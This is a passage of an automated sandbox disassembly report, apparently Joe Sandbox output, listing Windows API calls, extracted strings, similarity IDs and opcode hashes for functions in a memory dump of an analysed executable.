                                                                            • Opcode Fuzzy Hash: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                            • Instruction Fuzzy Hash: 46511CB16083069FC318DF68DD85A2BB7E9ABC8300F144A2DF985D3391E6B4ED058B95
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                            • String ID:
                                                                            • API String ID: 136442275-0
                                                                            • Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                            • Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
                                                                            • Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                            • Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7
                                                                            APIs
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ConnectRegistry_wcslen
                                                                            • String ID: HH
                                                                            • API String ID: 535477410-2761332787
                                                                            • Opcode ID: 494d45e37ad428fecd4b7fac967c7a4690a8e424be50daab94eb1a805ddb89e5
                                                                            • Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
                                                                            • Opcode Fuzzy Hash: 494d45e37ad428fecd4b7fac967c7a4690a8e424be50daab94eb1a805ddb89e5
                                                                            • Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
                                                                            APIs
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 004604B5
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
                                                                            • _wcslen.LIBCMT ref: 00460502
                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 00460510
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00460589
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00460606
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 0046063E
                                                                            • GetWindowRect.USER32(?,?), ref: 004606AD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
                                                                            • String ID: ThumbnailClass
                                                                            • API String ID: 4123061591-1241985126
                                                                            • Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                            • Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
                                                                            • Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                            • Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: DestroyWindow
                                                                            • String ID: static
                                                                            • API String ID: 3375834691-2160076837
                                                                            • Opcode ID: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                            • Instruction ID: 4605c95b1b006c90d65e271c0fdf07f62d21d56273c2870bf7f2e3decf5281c5
                                                                            • Opcode Fuzzy Hash: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                            • Instruction Fuzzy Hash: 4531B572200300BBD7109B64DC45F6BB3A8EBC9711F204A2EFA50D72C0D7B4E8048B69
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
                                                                            • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
                                                                            • _memcmp.LIBCMT ref: 004394A9
                                                                            • CloseHandle.KERNEL32(?), ref: 004394F8
                                                                            Strings
                                                                            • SeAssignPrimaryTokenPrivilege, xrefs: 00439455
                                                                            • SeIncreaseQuotaPrivilege, xrefs: 0043946A
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                                                            • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                                                            • API String ID: 1446985595-805462909
                                                                            • Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                            • Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                                                                            • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                            • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                            • String ID: 0$X+
                                                                            • API String ID: 176399719-479754480
                                                                            • Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                            • Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
                                                                            • Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                            • Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                                                                            • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DriveType
                                                                            • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                                                                            • API String ID: 2907320926-41864084
                                                                            • Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                            • Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
                                                                            • Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                            • Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
                                                                            APIs
                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0046735D
                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004673ED
                                                                            • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00467559
                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824,?,?,?,?,?), ref: 004675E4
                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                            • String ID:
                                                                            • API String ID: 1932665248-0
                                                                            • Opcode ID: 540ab9611df07496c965c6f5b012998b0ae5b601d672a50a0582804279fda95d
                                                                            • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                                                                            • Opcode Fuzzy Hash: 540ab9611df07496c965c6f5b012998b0ae5b601d672a50a0582804279fda95d
                                                                            • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 00444D8A
                                                                            • GetAsyncKeyState.USER32 ref: 00444E0F
                                                                            • GetKeyState.USER32(000000A0), ref: 00444E26
                                                                            • GetAsyncKeyState.USER32 ref: 00444E40
                                                                            • GetKeyState.USER32(000000A1), ref: 00444E51
                                                                            • GetAsyncKeyState.USER32 ref: 00444E69
                                                                            • GetKeyState.USER32(00000011), ref: 00444E77
                                                                            • GetAsyncKeyState.USER32 ref: 00444E8F
                                                                            • GetKeyState.USER32(00000012), ref: 00444E9D
                                                                            • GetAsyncKeyState.USER32 ref: 00444EB5
                                                                            • GetKeyState.USER32(0000005B), ref: 00444EC3
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            • Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                            • Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
                                                                            • Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                            • Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HH
                                                                            • API String ID: 0-2761332787
                                                                            • Opcode ID: 9f3a2665df019714f0744ddd647493bec623add609b0b214ee0a4c07b146d389
                                                                            • Instruction ID: 1932890218e454eaab518c2d08cf67ea4bcb6b95680f1d85a47b5a5cee1eebd3
                                                                            • Opcode Fuzzy Hash: 9f3a2665df019714f0744ddd647493bec623add609b0b214ee0a4c07b146d389
                                                                            • Instruction Fuzzy Hash: 99A1A1726043009BD710EF65DC82B6BB3E9ABD4718F008E2EF558E7281D779E9448B5A
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
                                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004508FC
                                                                            • _wcslen.LIBCMT ref: 00450944
                                                                            • _wcscat.LIBCMT ref: 00450955
                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
                                                                            • SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
                                                                            Similarity
                                                                            • API ID: MessageSend$Window_wcscat_wcslen
                                                                            • String ID: -----$SysListView32
                                                                            • API String ID: 4008455318-3975388722
                                                                            • Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                            • Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
                                                                            • Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                            • Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65
                                                                            APIs
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
                                                                            • GetDlgCtrlID.USER32 ref: 00469289
                                                                            • GetParent.USER32 ref: 004692A4
                                                                            • SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
                                                                            • GetDlgCtrlID.USER32 ref: 004692AE
                                                                            • GetParent.USER32 ref: 004692C7
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent$_wcslen
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 2040099840-1403004172
                                                                            • Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                            • Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
                                                                            • Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                            • Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
                                                                            APIs
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
                                                                            • GetDlgCtrlID.USER32 ref: 00469483
                                                                            • GetParent.USER32 ref: 0046949E
                                                                            • SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
                                                                            • GetDlgCtrlID.USER32 ref: 004694A8
                                                                            • GetParent.USER32 ref: 004694C1
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent$_wcslen
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 2040099840-1403004172
                                                                            • Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                            • Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
                                                                            • Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                            • Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779
                                                                            Similarity
                                                                            • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                            • String ID:
                                                                            • API String ID: 3413494760-0
                                                                            • Opcode ID: 3e576700eaa120b4cc2728f51a198fd447c15b227df8d5eef1ac6b7d3da7ef95
                                                                            • Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
                                                                            • Opcode Fuzzy Hash: 3e576700eaa120b4cc2728f51a198fd447c15b227df8d5eef1ac6b7d3da7ef95
                                                                            • Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32(?,?,?,?,0045FDE0,?,?,00000001), ref: 004377D7
                                                                            • GetForegroundWindow.USER32 ref: 004377EB
                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00437809
                                                                            • GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0043782E
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0043783D
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 0043788D
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004378A1
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004378AC
                                                                            Similarity
                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                            • String ID:
                                                                            • API String ID: 2156557900-0
                                                                            • Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                            • Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
                                                                            • Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                            • Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69
                                                                            Similarity
                                                                            • API ID: __wcsicoll
                                                                            • String ID: 0%d$DOWN$OFF
                                                                            • API String ID: 3832890014-468733193
                                                                            • Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                            • Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
                                                                            • Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                            • Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(00000000), ref: 0045E959
                                                                            • VariantCopy.OLEAUT32(00000000), ref: 0045E963
                                                                            • VariantClear.OLEAUT32 ref: 0045E970
                                                                            • VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
                                                                            • __swprintf.LIBCMT ref: 0045EB1F
                                                                            • VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
                                                                            • VariantInit.OLEAUT32(00000000), ref: 0045EBE7
                                                                            Strings
                                                                            • %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
                                                                            Similarity
                                                                            • API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
                                                                            • String ID: %4d%02d%02d%02d%02d%02d
                                                                            • API String ID: 43541914-1568723262
                                                                            • Opcode ID: babf121c1f21bd7c9f5b22c45122f4cf13babb3f4a346428986e0a82870c9096
                                                                            • Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
                                                                            • Opcode Fuzzy Hash: babf121c1f21bd7c9f5b22c45122f4cf13babb3f4a346428986e0a82870c9096
                                                                            • Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
                                                                            APIs
                                                                            • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FE66
                                                                            • Sleep.KERNEL32(0000000A), ref: 0042FE6E
                                                                            • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FF5D
                                                                            Similarity
                                                                            • API ID: DecrementInterlocked$Sleep
                                                                            • String ID: 0vH$0vH$4RH0vH$@COM_EVENTOBJ
                                                                            • API String ID: 2250217261-3412429629
                                                                            • Opcode ID: 7d20af892ce27232a3ff337619be48fed7d74e1bde2de334c7b49ab88d15dd8c
                                                                            • Instruction ID: 990b5f35a06538e4ae7b6c94f393f4a5fafaaf51bfa382c75dcb300f2d234fa3
                                                                            • Opcode Fuzzy Hash: 7d20af892ce27232a3ff337619be48fed7d74e1bde2de334c7b49ab88d15dd8c
                                                                            • Instruction Fuzzy Hash: E0B1C0715083009FC714EF54C990A5FB3E4AF98304F508A2FF495972A2DB78ED4ACB9A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                            • API String ID: 0-1603158881
                                                                            • Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                            • Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
                                                                            • Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                            • Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00479D1F
                                                                            • VariantInit.OLEAUT32(?), ref: 00479F06
                                                                            • VariantClear.OLEAUT32(?), ref: 00479F11
                                                                            • VariantInit.OLEAUT32(?), ref: 00479DF7
                                                                              • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
                                                                              • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
                                                                              • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
                                                                            • VariantClear.OLEAUT32(?), ref: 00479F9C
                                                                              • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$Copy$ClearInit$ErrorLast_memset
